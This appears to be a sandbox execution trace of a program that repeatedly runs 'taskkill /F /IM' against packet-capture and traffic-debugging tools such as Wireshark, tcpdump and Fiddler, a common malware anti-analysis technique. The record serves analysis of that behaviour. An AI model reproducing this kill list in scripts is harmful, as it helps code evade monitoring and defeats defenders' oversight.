C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

